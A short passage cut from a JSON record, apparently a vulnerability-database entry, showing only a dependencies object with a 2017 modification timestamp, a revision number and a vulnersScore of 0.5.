2}, "dependencies": {"references": [], "modified": "2017-11-19T21:40:37", "rev": 2}, "vulnersScore": 0.5}}
{}